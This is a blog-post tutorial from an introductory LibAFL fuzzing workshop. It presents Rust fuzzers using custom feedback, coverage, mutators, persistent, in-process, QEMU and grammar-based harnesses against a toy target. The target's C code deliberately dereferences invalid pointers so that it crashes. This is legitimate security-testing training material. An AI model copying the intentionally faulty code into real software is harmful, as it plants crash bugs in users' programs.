Normal view

There are new articles available, click to refresh the page.
Before yesterdayBlog - Atredis Partners

A LibAFL Introductory Workshop

4 December 2023 at 23:54


Why LibAFL

Fuzzing is great! Throwing randomized inputs at a target really fast can have unreasonable effectiveness with the right setup. When starting with a new target a fuzzing harness can iterate along with your reversing/auditing efforts and you can sleep well at night knowing your cores are taking the night watch. When looking for bugs our time is often limited; any effort spent on tooling needs to be time well spent. LibAFL is a great library that can let us quickly adapt a fuzzer to our specific target. Not every target fits nicely into the "Command-line program that parses a file" category, so LibAFL lets us craft fuzzers for our specific situations. This adaptability opens up the power of fuzzing for a wider range of targets.

Why a workshop

The following material comes from an internal workshop used as an introduction to LibAFL. This post is a summary of the workshop, and includes a repository of exercises and examples for following along at home. It expects some existing understanding of rust and fuzzing concepts. (If you need a refresher on rust: google's comprehensive rust is great.)

There are already a few good resources for learning about LibAFL.

This workshop seeks to add to the existing corpus of example fuzzers built with LibAFL, with a focus on customizing fuzzers to our targets. You will also find a few starter problems for getting hands on experience with LibAFL. Throughout the workshop we try to highlight the versatility and power of the library, letting you see where you can fit a fuzzer in your flow.

Course Teaser

As an aside, if you are interested in this kind of thing (security tooling, bugs, fuzzing), you may be interested in our Symbolic Execution course. We have a virtual session planned for Febuary 2024 with ringzer0. There is more information at the end of this post.

The Fuzzers

The target

Throughout the workshop we beat up on a simple target that runs on Linux. This target is not very interesting, but acts as a good example target for our fuzzers. It takes in some text, line by line, and replaces certain identifiers (like {{XXd3sMRBIGGGz5b2}}) with names. To do so, it contains a function with a very large lookup tree. In this function many lookup cases can result in a segmentation fault.

    const char* uid_to_name(const char* uid) {
        /*...*/ // big nested mess of switch statements
                        switch (nbuf[14]) {
                        case 'b':
                            // regular case, no segfault
                            addr = &names[0x4b9];
                            LOG("UID matches known name at %p", addr);
                            return *addr;
                        case '7':
                            // a bad case
                            addr = ((const char**)0x68c2);
                            // SEGFAULT here
                            LOG("UID matches known name at %p", addr); 
                            return *addr;

This gives us a target that has many diverting code paths, and many reachable "bugs" to find. As we progress we will adapt our fuzzers to this target, showing off some common ways we can mold a fuzzer to a target with LibAFL.

You can find our target here, and the repository includes a couple variations that will be useful for later examples. ./fuzz_target/target.c

Pieces of a Fuzzer

Before we dive into the examples, let's establish an quick understanding of modern fuzzer internals. LibAFL breaks a fuzzer down into pieces that can be swapped out or changed. LibAFL makes great use of rust's trait system to do this. Below we have a diagram of a very simple fuzzer.

A block diagram of a minimal fuzzer

The script for this fuzzer could be as simple as the following.

while ! [ -f ./core.* ]
    head -c 900 /dev/urandom > ./testfile
    cat ./testfile | ./target

The simple fuzzer above follows three core steps.

1) Makes a randomized input

2) Runs the target with the new input

3) Keeps the created input if it causes a "win" (in this case a win is crash that produces a core file)

If you miss any of the above pieces, you won't have a very good fuzzer. We all have heard the sad tale of researchers who piped random inputs into their target, got an exciting crash, but were unable to ever reproduce the bug because they didn't save off the test case.

Even with the above pieces, that simple fuzzer will struggle to make any real progress toward finding bugs. It does not even have a notion of what progress means! Below we have a diagram of what a more modern fuzzer might look like.

A block diagram of a fuzzer with feedback

This fuzzer works off a set of existing inputs, which are randomly mutated to create the new test cases. The "mutations" are just a simple set of modifications to the input that can be quickly applied to generate new exciting inputs. Importantly, this fuzzer also uses observations from the executing target to know if a inputs was "interesting". Instead of only caring out crashes, a fuzzer with feedback can route mutated test cases back into the set of inputs to be mutated. This allows a fuzzer to progress by iterating on an input, tracking down interesting features in the target.

LibAFL provides tools for each of these "pieces" of a fuzzer.

There are other important traits we will see as well. Be sure to look at the "Implementors" section of the trait documentation to see useful implementations provided by the library.

Exec fuzzer

Which brings us to our first example! Let's walk through a bare-bones fuzzer using LibAFL.


The source is well-commented, and you should read through it. Here we just highlight a few key sections of this simple fuzzer.

        let mut executor = CommandExecutor::builder()

        let mut state = StdState::new(
            &mut feedback,
            &mut objective,

Our fuzzer uses a "state" object which tracks the set of input test cases, any solution test cases, and other metadata. Notice we are choosing to keep our inputs in memory, but save out the solution test cases to disk.

We use a CommandExecutor for executing our target program, which will run the target process and pass in the test case.

        let mutator = StdScheduledMutator::with_max_stack_pow(
            9,                 // maximum mutation iterations

        let mut stages = tuple_list!(StdMutationalStage::new(mutator));

We build a very simple pipeline for our inputs. This pipeline only has one stage, which will randomly select from a set of mutations for each test case.

        let scheduler = RandScheduler::new();
        let mut fuzzer = StdFuzzer::new(scheduler, feedback, objective);

        // load the initial corpus in our state
        // since we lack feedback in this fuzzer, we have to force this,
        state.load_initial_inputs_forced(&mut fuzzer, &mut executor, &mut mgr, &[PathBuf::from("../fuzz_target/corpus/")]).unwrap();

        // fuzz
        fuzzer.fuzz_loop(&mut stages, &mut executor, &mut state, &mut mgr).expect("Error in fuzz loop");

With a fuzzer built from a scheduler and some feedbacks (here we use a ConstFeedback::False to not have any feedback except for the objective feedback which is a CrashFeedback), we can load our initial entries and start to fuzz. We use the created stages, chosen executor, the state, and an event manager to start fuzzing. Our event manager will let us know when we start to get "wins".

[jordan exec_fuzzer]$ ./target/release/exec_fuzzer/

[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 1, objectives: 0, executions: 1, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 2, objectives: 0, executions: 2, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 3, objectives: 0, executions: 3, exec/sec: 0.000
[Objective #0] run time: 0h-0m-1s, clients: 1, corpus: 3, objectives: 1, executions: 3, exec/sec: 2.932
[Stats #0] run time: 0h-0m-15s, clients: 1, corpus: 3, objectives: 1, executions: 38863, exec/sec: 2.590k
[Objective #0] run time: 0h-0m-20s, clients: 1, corpus: 3, objectives: 2, executions: 38863, exec/sec: 1.885k

Our fragile target quickly starts giving us crashes, even with no feedback. Working from a small set of useful inputs helps our mutations be able to find crashing inputs.

This simple execution fuzzer gives us a good base to work from as we add features to our fuzzer.

Exec fuzzer with custom feedback

We can't effectively iterate on interesting inputs without feedback. Currently our random mutations must generate a crashing case in one go. If we can add feedback to our fuzzer, then we can identify test cases that did something interesting. We will loop those interesting test cases back into our set of cases for further mutation.

There are many different sources we could turn to for this information. For this example, let's use the fuzz_target/target_dbg binary which is a build of our target with some debug output on stderr. By looking at this debug output we can start to identify interesting cases. If a test case gets us some debug output we hadn't previously seen before, then we can say it is interesting and worth iterating on.

There isn't an existing implementation of this kind of feedback in the LibAFL library, so we will have to make our own! If you want to try this yourself, we have provided a template file in the repository.


The LibAFL repo provides a StdErrObserver structure we can use with our CommandExecutor. This observer will allow our custom feedback structure to receive the stderr output from our run. All we need to do is create a structure that implements the is_interesting method of the Feedback trait, and we should be good to go. In that method we are provided with the state, the mutated input, the observers. We just have to get the debug output from the StdErrObserver and determine if we reached somewhere new.

impl<S> Feedback<S> for NewOutputFeedback
    S: UsesInput + HasClientPerfMonitor,
    fn is_interesting<EM, OT>(
        &mut self,
        _state: &mut S,
        _manager: &mut EM,
        _input: &S::Input,
        observers: &OT,
        _exit_kind: &ExitKind
    ) -> Result<bool, Error>
       where EM: EventFirer<State = S>,
             OT: ObserversTuple<S>
        // return Ok(false) for uninteresting inputs
        // return Ok(true) for interesting ones

I encourage you to try implementing this feedback yourself. You may want to find some heuristics to ignore unhelpful debug messages. We want to avoid reporting too many inputs as useful, so we don't overfill our input corpus. The input corpus is the set of inputs we use for generating new test cases. We will waste lots of time when there are inputs in that set that are not actually helping us dig towards a win. Ideally we want each of these inputs to be as small and quick to run as possible, while exercising a unique path in our target.

In our solution, we simply keep a set of seen hashes. We report an input to be interesting if we see it caused a unique hash.


        fn is_interesting<EM, OT>(
            &mut self,
            _state: &mut S,
            _manager: &mut EM,
            _input: &S::Input,
            observers: &OT,
            _exit_kind: &ExitKind
        ) -> Result<bool, Error>
           where EM: EventFirer<State = S>,
                 OT: ObserversTuple<S>
            let observer = observers.match_name::<StdErrObserver>(&self.observer_name)
                .expect("A NewOutputFeedback needs a StdErrObserver");

            let mut hasher = DefaultHasher::new();
            let hash = hasher.finish();

            if self.hash_set.contains(&hash) {
            } else {

This ends up finding "interesting" inputs very quickly, and blowing up our input corpus.

[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 308, objectives: 0, executions: 4388, exec/sec: 2.520k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 309, objectives: 0, executions: 4423, exec/sec: 2.520k
[Objective #0] run time: 0h-0m-1s, clients: 1, corpus: 309, objectives: 1, executions: 4423, exec/sec: 2.497k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 310, objectives: 1, executions: 4532, exec/sec: 2.520k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 311, objectives: 1, executions: 4629, exec/sec: 2.521k

Code Coverage Feedback

Relying on the normal side-effects of a program (like debug output, system interactions, etc) is not very reliable for deeply exploring a target. There may be many interesting features that we miss using this kind of feedback. The feedback of choice for many modern fuzzers is "code coverage". By observing what blocks of code are being executed, we can gain insight into what inputs are exposing interesting logic.

Being able to collect that information, however, is not always straight forward. If you have access to the source code, you may be able to use a compiler to instrument the code with this information. If not, you may have to find ways to dynamically instrument your target either through binary modification, emulation, or other sources.

AFL++ provides a version of clang with compiler-level instrumentation for providing code coverage feedback. LibAFL can observe the information produced by this instrumentation, and we can use it for feedback. We have a build of our target using afl-clang-fast. With this build (target_instrumented), we can use the LibAFL ForkserverExecutor to communicate with our instrumented target. The HitcountsMapObserver can use shared memory for receiving our coverage information each run.

You can see our fuzzer's code here.


        let mut shmem_provider = UnixShMemProvider::new().unwrap();
        let mut shmem = shmem_provider.new_shmem(MAP_SIZE).unwrap();
        // write the id to the env var for the forkserver
        let shmembuf = shmem.as_mut_slice();
        // build an observer based on that buffer shared with the target
        let edges_observer = unsafe {HitcountsMapObserver::new(StdMapObserver::new("shared_mem", shmembuf))};
        // use that observed coverage to feedback based on obtaining maximum coverage
        let mut feedback = MaxMapFeedback::tracking(&edges_observer, true, false);

        // This time we can use a fork server executor, which uses a instrumented in fork server
        // it gets a greater number of execs per sec by not having to init the process for each run
        let mut executor = ForkserverExecutor::builder()
            .shmem_provider(&mut shmem_provider)

The compiled-in fork server should also reduce our time needed to instantiate a run, by forking off partially instantiated processes instead of starting from scratch each time. This should offset some of the cost of our instrumentation.

When executed, our fuzzer quickly finds new paths through the process, building up our corpus of interesting cases and guiding our fuzzer.

[jordan aflcc_fuzzer]$ ./target/release/aflcc_fuzzer 

[Stats #0] run time: 0h-0m-0s, clients: 1, corpus: 0, objectives: 0, executions: 0, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 1, objectives: 0, executions: 1, exec/sec: 0.000
[Stats #0] run time: 0h-0m-0s, clients: 1, corpus: 1, objectives: 0, executions: 1, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-0s, clients: 1, corpus: 2, objectives: 0, executions: 2, exec/sec: 0.000
[Stats #0] run time: 0h-0m-0s, clients: 1, corpus: 2, objectives: 0, executions: 2, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-10s, clients: 1, corpus: 100, objectives: 0, executions: 19152, exec/sec: 1.823k
[Objective #0] run time: 0h-0m-10s, clients: 1, corpus: 100, objectives: 1, executions: 19152, exec/sec: 1.762k
[Stats #0] run time: 0h-0m-11s, clients: 1, corpus: 100, objectives: 1, executions: 19152, exec/sec: 1.723k
[Testcase #0] run time: 0h-0m-11s, clients: 1, corpus: 101, objectives: 1, executions: 20250, exec/sec: 1.821k

Custom Mutation

So far we have been using the havoc_mutations, which you can see here is a set of mutations that are pretty good for lots of targets.


Many of these mutations are wasteful for our target. In order to get to the vulnerable uid_to_name function, the input must first pass a valid_uid check. In this check, characters outside of the range A-Za-z0-9\-_ are rejected. Many of the havoc_mutations, such as the BytesRandInsertMutator, will introduce characters that are not in this range. This results in many test cases that are wasted.

With this knowledge about our target, we can use a custom mutator that will insert new bytes only in the desired range. Implementing the Mutator trait is simple, we just have to provide a mutate function.

    impl<I, S> Mutator<I, S> for AlphaByteSwapMutator
        I: HasBytesVec,
        S: HasRand,
        fn mutate(
            &mut self,
            state: &mut S,
            input: &mut I,
            _stage_idx: i32,
        ) -> Result<MutationResult, Error> {

                return Ok(MutationResult::Mutated) when you mutate the input
                or Ok(MutationResult::Skipped) when you don't


If you want to try this for yourself, feel free to use the aflcc_custom_mut_template as a template to get started.


In our solution we use a set of mutators, including our new AlphaByteSwapMutator and a few existing mutators. This set should hopefully result in a greater number of valid test cases that make it to the uid_to_name function.

        // we will specify our custom mutator, as well as two other helpful mutators for growing or shrinking
        let mutator = StdScheduledMutator::with_max_stack_pow(

Then in our mutator we use the state's source of random to choose a location, and a new byte from a set of valid characters.

        fn mutate(
            &mut self,
            state: &mut S,
            input: &mut I,
            _stage_idx: i32,
        ) -> Result<MutationResult, Error> {
            // here we apply our random mutation
            // for our target, simply swapping a byte should be effective
            // so long as our new byte is 0-9A-Za-z or '-' or '_'

            // skip empty inputs
            if input.bytes().is_empty() {
                return Ok(MutationResult::Skipped)

            // choose a random byte
            let byte: &mut u8 = state.rand_mut().choose(input.bytes_mut());

            // don't replace tag chars '{{}}'
            if *byte == b'{' || *byte == b'}' {
                return Ok(MutationResult::Skipped)

            // now we can replace that byte with a known good byte
            *byte = *state.rand_mut().choose(&self.good_bytes);

            // technically we should say "skipped" if we replaced a byte with itself, but this is fine for now

And that is it! The custom mutator works seamlessly with the rest of the system. Being able to quickly tweak fuzzers like this is great for adapting to your target. Experiments like this can help us quickly iterate when combined with performance measurements.

[Stats #0] run time: 0h-0m-1s, clients: 1, corpus: 76, objectives: 1, executions: 2339, exec/sec: 1.895k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 77, objectives: 1, executions: 2386, exec/sec: 1.933k
[Stats #0] run time: 0h-0m-1s, clients: 1, corpus: 77, objectives: 1, executions: 2386, exec/sec: 1.928k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 78, objectives: 1, executions: 2392, exec/sec: 1.933k

Example Problem

At this point, we have a separate target you may want to experiment with! It is a program that contains a small maze, and gives you a chance to create a fuzzer with some custom feedback or mutations to better traverse the maze and discover a crash. Play around with some of the concepts we have introduced here, and see how fast your fuzzer can solve the maze.


[jordan maze_target]$ ./maze -p

█.██......█ ██
█....██ █.☺  █
██████  █ ██ █
██   ██████  █
█  █  █     ██
█ ███   ██████
█  ███ ██   ██
██   ███  █  █
████ ██  ███ █
█    █  ██ █ █
█ ████ ███ █ █
█          █  


  #          #
# # ### #### #
# # ##  #...@#
# ###  ##.####
#  #  ###...##
##   ## ###..#
#.##.#  ######
#....# ##....#
## #......##.#
[Testcase #0] run time: 0h-0m-2s, clients: 1, corpus: 49, objectives: 0, executions: 5745, exec/sec: 2.585k

  #          #
# # ### ####@#
# # ##  #....#
# ###  ##.####
#  #  ###...##
##   ## ###..#
#.##.#  ######
#....# ##....#
## #......##.#
[Testcase #0] run time: 0h-0m-3s, clients: 1, corpus: 50, objectives: 0, executions: 8892, exec/sec: 2.587k

Going Faster

Persistent Fuzzer

In previous examples, we have made use of the ForkserverExecutor which works with the forkserver that afl-clang-fast inserted into our target. While the fork server does give us a great speed boost by reducing the start-up time for each target process, we still require a new process for each test case. If we can instead run multiple test cases in one process, we can speed up our fuzzing greatly. Running multiple testcases per target process is often called "persistent mode" fuzzing.

As they say in the AFL++ documentation:

Basically, if you do not fuzz a target in persistent mode, then you are just doing it for a hobby and not professionally :-).

Some targets do not play well with persistent mode. Anything that changes lots of global state each run can have trouble, as we want each test case to run in isolation as much as possible. Even for targets well suited for persistent mode, we usually will have to create a harness around the target code. This harness is just a bit of code we write to call in to the target for fuzzing. The AFL++ documentation on persistent mode with LLVM is a great reference for writing these kinds of harnesses.

When we have created such a harness, the inserted fork server will detect the ability to persist, and can even use shared memory to provide the test cases. LibAFL's ForkserverExecutor can let us make use of these persistent harnesses.

Our fuzzer using a persistent harness is not much changed from our previous fuzzers.


The main change is in telling our ForkServerExecutor that it is_persistent(true).

        let mut executor = ForkserverExecutor::builder()
            .shmem_provider(&mut shmem_provider)

The ForkserverExecutor takes care of the magic to make this all happen. Most of our work goes into actually creating an effective harness! If you want to try and craft your own, we have a bit of a template ready for you to get started.


In our harness we want to be careful to reset state each round, so we remain as true to our original as possible. Any modified global variables, heap allocations, or side-effects from a run that could change the behavior of future runs needs to be undone. Failure to clean the program state can result in false positives or instability. If we want our winning test cases from this fuzzer to also be able to crash the original target, then we need to emulate the original target's behavior as close as possible.

Sometimes it is not worth it to emulate the original, and instead use our harness to target deeper surface. For example in our target we could directly target the uid_to_name function, and then convert the solutions into solutions for our original target later. We would want to also call valid_uid in our harness, to ensure we don't report false positives that would never work against our original target.

You can inspect our persistent harness here; we choose to repeatedly call process_line for each line and take care to clean up after ourselves.


Where previously we saw around 2k executions per second for our fuzzers with code coverage feedback, we are now seeing around 5k or 6k, still with just one client.

[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 171, objectives: 4, executions: 95677, exec/sec: 5.826k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 172, objectives: 4, executions: 96236, exec/sec: 5.860k
[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 172, objectives: 4, executions: 96236, exec/sec: 5.821k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 173, objectives: 4, executions: 96933, exec/sec: 5.863k
[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 173, objectives: 4, executions: 96933, exec/sec: 5.798k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 174, objectives: 4, executions: 98077, exec/sec: 5.866k
[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 174, objectives: 4, executions: 98077, exec/sec: 5.855k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 175, objectives: 4, executions: 98283, exec/sec: 5.867k
[Stats #0] run time: 0h-0m-16s, clients: 1, corpus: 175, objectives: 4, executions: 98283, exec/sec: 5.853k
[Testcase #0] run time: 0h-0m-16s, clients: 1, corpus: 176, objectives: 4, executions: 98488, exec/sec: 5.866k

In-Process Fuzzer

Using AFL++'s compiler and fork server is not the only way to achieve multiple test cases in one process. LibAFL is an extremely flexible library, and supports all sorts of scenarios. The InProcessExecutor allows us to run test cases directly in the same process as our fuzzing logic. This means if we can link with our target somehow, we can fuzz in the same process.

The versatility of LibAFL means we can build our entire fuzzer as a library, which we can link into our target, or even preload into our target dynamically. LibAFL even supports nostd (compilation without dependency on an OS or standard library), so we can treat our entire fuzzer as a blob to inject into our target's environment. As long as execution reaches our fuzzing code, we can fuzz.

In our example we build our fuzzer and link with our target built as a static library, calling into the C code directly using rust's FFI.

Building our fuzzer and causing it to link with our target is done by providing a build.rs file, which the rust compilation will use.


    fn main() {
        let target_dir = "../fuzz_target".to_string();
        let target_lib = "target_libfuzzer".to_string();

        // force us to link with the file 'libtarget_libfuzzer.a'
        println!("cargo:rustc-link-search=native={}", &target_dir);
        println!("cargo:rustc-link-lib=static:+whole-archive={}", &target_lib);


LibAFL also provides tools to wrap the clang compiler, if you wish to create a compiler that will automatically inject your fuzzer into the target. You can see examples of this in the LibAFL examples.

We will want a harness for this target as well, so we can pass our test cases in as a buffer instead of having the target read lines from stdin. We will use the common interface used by libfuzzer, which has us create a function called LLVMFuzzerTestOneInput. LibAFL even has some helpers that will do the FFI calls for us.

Our harness can be very similar to the one we created for persistent mode fuzzing. We also have to watch out for the same kinds of global state or memory leaks that could make our fuzzing unstable. Again, we have a template for you if you want to craft the harness yourself.


With LLVMFuzzerTestOneInput defined in our target, and a static library made, our fuzzer can directly call into the harness for each test case. We define a harness function which our executor will call with the test case data.

        // our executor will be just a wrapper around a harness
        // that calls out the the libfuzzer style harness
        let mut harness = |input: &BytesInput| {
            let target = input.target_bytes();
            let buf = target.as_slice();
            // this is just some niceness to call the libfuzzer C function
            // but we don't need to use a libfuzzer harness to do inproc fuzzing
            // we can call whatever function we want in a harness, as long as it is linked
            return ExitKind::Ok;

        let mut executor = InProcessExecutor::new(
            &mut harness,
            &mut fuzzer,
            &mut state,
            &mut restarting_mgr,

This easy interoperability with libfuzzer harnesses is nice, and again we see a huge speed improvement over our previous fuzzers.

[jordan inproc_fuzzer]$ ./target/release/inproc_fuzzer 

Starting up
[Stats       #1]  (GLOBAL) run time: 0h-0m-16s, clients: 2, corpus: 0, objectives: 0, executions: 0, exec/sec: 0.000
                  (CLIENT) corpus: 0, objectives: 0, executions: 0, exec/sec: 0.000, edges: 0/37494 (0%)
[Testcase    #1]  (GLOBAL) run time: 0h-0m-19s, clients: 2, corpus: 102, objectives: 5, executions: 106146, exec/sec: 30.79k
                  (CLIENT) corpus: 102, objectives: 5, executions: 106146, exec/sec: 30.79k, edges: 136/37494 (0%)
[Stats       #1]  (GLOBAL) run time: 0h-0m-19s, clients: 2, corpus: 102, objectives: 5, executions: 106146, exec/sec: 30.75k
                  (CLIENT) corpus: 102, objectives: 5, executions: 106146, exec/sec: 30.75k, edges: 137/37494 (0%)
[Testcase    #1]  (GLOBAL) run time: 0h-0m-19s, clients: 2, corpus: 103, objectives: 5, executions: 106626, exec/sec: 30.88k
                  (CLIENT) corpus: 103, objectives: 5, executions: 106626, exec/sec: 30.88k, edges: 137/37494 (0%)
[Objective   #1]  (GLOBAL) run time: 0h-0m-20s, clients: 2, corpus: 103, objectives: 6, executions: 106626, exec/sec: 28.32k

In this fuzzer we are also making use of a very important tool offered by LibAFL: the Low Level Message Passing (LLMP). This provides quick communication between multiple clients and lets us effectively scale our fuzzing to multiple cores or even multiple machines. The setup_restarting_mgr_std helper function creates an event manager that will manage the clients and restart them when they encounter crashes.

        let monitor = MultiMonitor::new(|s| println!("{s}"));

        println!("Starting up");

        // we use a restarting manager which will restart
        // our process each time it crashes
        // this will set up a host manager, and we will have to start the other processes
        let (state, mut restarting_mgr) = setup_restarting_mgr_std(monitor, 1337, EventConfig::from_name("default"))
            .expect("Failed to setup the restarter!");

        // only clients will return from the above call
        println!("We are a client!");

This speed gain is important, and can make the difference between finding the juicy bug or not. Plus, it feels good to use all your cores and heat up your room a bit in the winter.


Of course, not all targets are so easy to nicely link with or instrument with a compiler. In those cases, LibAFL provides a number of interesting tools like libafl_frida or libafl_nyx. In this next example we are going to use LibAFL's modified version of QEMU to give us code coverage feedback on a binary with no built in instrumentation. The modified version of QEMU will expose code coverage information to our fuzzer for feedback.

The setup will be similar to our in-process fuzzer, except now our harness will be in charge of running the emulator at the desired location in the target. By default the emulator state is not reset for you, and you will want to reset any global state changed between runs.

If you want to try it out for yourself, consult the Emulator documentation, and feel free to start with our template.


In our solution we first execute some initialization until a breakpoint, then save off the stack and return address. We will have to reset the stack each run, and put a breakpoint on the return address so that we can stop after our call. We also map an area in our target where we can place our input.

        unsafe { emu.run() };

        let pc: GuestReg = emu.read_reg(Regs::Pc).unwrap();

        // save the ret addr, so we can use it and stop
        let retaddr: GuestAddr = emu.read_return_address().unwrap();

        let savedsp: GuestAddr = emu.read_reg(Regs::Sp).unwrap();

        // now let's map an area in the target we will use for the input.
        let inputaddr = emu.map_private(0, 0x1000, MmapPerms::ReadWrite).unwrap();
        println!("Input page @ {inputaddr:#x}");

Now in the harness itself we will take the input and write it into the target, then start execution at the target function. This time we are executing the uid_to_name function directly, and using a mutator that will not add any invalid characters that valid_uid would have stopped.

        let mut harness = |input: &BytesInput| {
            let target = input.target_bytes();
            let mut buf = target.as_slice();
            let mut len = buf.len();

            // limit out input size
            if len > 1024 {
                buf = &buf[0..1024];
                len = 1024;

            // write our testcase into memory, null terminated
            unsafe {
                emu.write_mem(inputaddr, buf);
                emu.write_mem(inputaddr + (len as u64), b"\0\0\0\0");
            // reset the registers as needed
            emu.write_reg(Regs::Pc, parseptr).unwrap();
            emu.write_reg(Regs::Sp, savedsp).unwrap();
            emu.write_reg(Regs::Rdi, inputaddr).unwrap();

            // run until our breakpoint at the return address
            // or a crash
            unsafe { emu.run() };

            // if we didn't crash, we are okay

This emulation can be very quick, especially if we can get away without having to reset a lot of state each run. By targeting a deeper function here we are likely to reach crashes quickly.

[Stats #0] run time: 0h-0m-1s, clients: 1, corpus: 54, objectives: 0, executions: 33349, exec/sec: 31.56k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 55, objectives: 0, executions: 34717, exec/sec: 32.85k
[Stats #0] run time: 0h-0m-1s, clients: 1, corpus: 55, objectives: 0, executions: 34717, exec/sec: 31.59k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 56, objectives: 0, executions: 36124, exec/sec: 32.87k
[2023-11-25T20:24:02Z ERROR libafl::executors::inprocess::unix_signal_handler] Crashed with SIGSEGV
[2023-11-25T20:24:02Z ERROR libafl::executors::inprocess::unix_signal_handler] Child crashed! 
[Objective #0] run time: 0h-0m-1s, clients: 1, corpus: 56, objectives: 1, executions: 36124, exec/sec: 28.73k

LibAFL also provides some useful helpers such as QemuAsanHelper and QemuSnapshotHelper. There is even support for full system emulation, as opposed to usermode emulation. Being able to use emulators effectively when fuzzing opens up a whole new world of targets.


Our method of starting with some initial inputs and simply mutating them can be very effective for certain targets, but less so for more complicated inputs. If we start with an input of some javascript like:

if (a < b) {

Our existing mutations might result in the following:

if\x00 (a << b) {

Which might find some bugs in parsers, but is unlikely to find deeper bugs in any javascript engine. If we want to exercise the engine itself, we will want to mostly produce valid javascript. This is a good use case for generation! By defining a grammar of what valid javascript looks like, we can generate lots of test cases to throw against the engine.

A block diagram of a basic generative fuzzer

As you can see in the diagram above, with just generation alone we are no longer using a mutation+feedback loop. There are lots of successful fuzzers that have gotten wins off generation alone (domato, boofuzz, a bunch of weird midi files), but we would like to have some form of feedback and progress in our fuzzing.

In order to make use of feedback in our generation, we can create an intermediate representation (IR) of our generated data. Then we can feed back the interesting cases into our inputs to be further mutated.

So our earlier javascript could be expressed as tokens like:

    (cond_lt (var a), (var b)),
        (func_call some_func,
            (arg_list (var a))

Our mutations on this tokenized version can do things like replace tokens with other valid tokens or add more nodes to the tree, creating a slightly different input. We can then use these IR inputs and mutations as we did earlier with code coverage feedback.

A block diagram of a generative fuzzer with mutation feedback

Now mutations on the IR could produce something like so:

    (cond_lt (const 0), (var b)),
        (func_call some_func
                (func_call some_func,
                    (arg_list ((var a), (var a)))

Which would render to valid javascript, and can be further mutated upon if it produces interesting feedback.

if (0 < b) {

LibAFL provides some great tools for getting your own generational fuzzer with feedback going. A version of the Nautilus fuzzer is included in LibAFL. To use it with our example, we first define a grammar describing what a valid input to our target looks like.


With LibAFL we can load this grammar into a NautilusContext that we can use for generation. We use a InProcessExecutor and in our harness we take in a NautilusInput which we render to bytes and pass to our LLVMFuzzerTestOneInput.


    // our executor will be just a wrapper around a harness closure
    let mut harness = |input: &NautilusInput| {
        // we need to convert our input from a natilus tree
        // into actual bytes
        input.unparse(&genctx, &mut bytes);

        let s = std::str::from_utf8(&bytes).unwrap();
        println!("Trying:\n{:?}", s);

        let buf = bytes.as_mut_slice();


        return ExitKind::Ok;

We also need to generate a few initial IR inputs and specify what mutations to use.

    if state.must_load_initial_inputs() {
        // instead of loading from an inital corpus, we will generate our initial corpus of 9 NautilusInputs
        let mut generator = NautilusGenerator::new(&genctx);
        state.generate_initial_inputs_forced(&mut fuzzer, &mut executor, &mut generator, &mut restarting_mgr, 9).unwrap();
        println!("Created initial inputs");

    // we can't use normal byte mutations, so we use mutations that work on our generator trees
    let mutator = StdScheduledMutator::with_max_stack_pow(

With this all in place, we can run and get the combined benefits of generation, code coverage, and in-process execution. To iterate on this, we can further improve our grammar as we better understand our target.

                  (CLIENT) corpus: 145, objectives: 2, executions: 40968, exec/sec: 1.800k, edges: 167/37494 (0%)
[Testcase    #1]  (GLOBAL) run time: 0h-0m-26s, clients: 2, corpus: 146, objectives: 2, executions: 41229, exec/sec: 1.811k
                  (CLIENT) corpus: 146, objectives: 2, executions: 41229, exec/sec: 1.811k, edges: 167/37494 (0%)
[Objective   #1]  (GLOBAL) run time: 0h-0m-26s, clients: 2, corpus: 146, objectives: 3, executions: 41229, exec/sec: 1.780k
                  (CLIENT) corpus: 146, objectives: 3, executions: 41229, exec/sec: 1.780k, edges: 167/37494 (0%)
[Stats       #1]  (GLOBAL) run time: 0h-0m-27s, clients: 2, corpus: 146, objectives: 3, executions: 41229, exec/sec: 1.755k

Note that our saved solutions are just serialized NautilusInputs and will not work when used against our original target. We have created a separate project that will render these solutions out to bytes with our grammar.


    let input: NautilusInput = NautilusInput::from_file(path).unwrap();
    let mut b = vec![];

    let tree_depth = 0x45;
    let genctx = NautilusContext::from_file(tree_depth, grammarpath);

    input.unparse(&genctx, &mut b);

    let s = std::str::from_utf8(&b).unwrap();
[jordan gen_solution_render]$ ./target/release/gen_solution_render ../aflcc_custom_gen/solutions/id\:0




[jordan gen_solution_render]$ ./target/release/gen_solution_render ../aflcc_custom_gen/solutions/id\:0 | ../fuzz_target/target

Segmentation fault (core dumped)

Example Problem 2

This brings us to our second take home problem! We have a chat client that is vulnerable to a number of issues. Fuzzing this binary could be made easier though good use of generation and/or emulation. As you find some noisy bugs you may wish to either avoid those paths in your fuzzer, or patch the bugs in your target. Bugs can often mask other bugs. You can find the target here.


As well as one example solution that can fuzz the chat client.


-- Ping from    16937944: D�DAAAATt'AAAAPt'%222�%%%%%%9999'pRR9&&&%%%%%2Tt�{�''pRt�'%99999999'pRR9&&&&&&999AATt'%&'pRt�'%TTTTTTTTTTTTTT9999999'a%''AAA��TTt�'% --
-- Error sending message: Bad file descriptor --
[Stats #0] run time: 0h-0m-5s, clients: 1, corpus: 531, objectives: 13, executions: 26752, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-5s, clients: 1, corpus: 532, objectives: 13, executions: 26760, exec/sec: 0.000
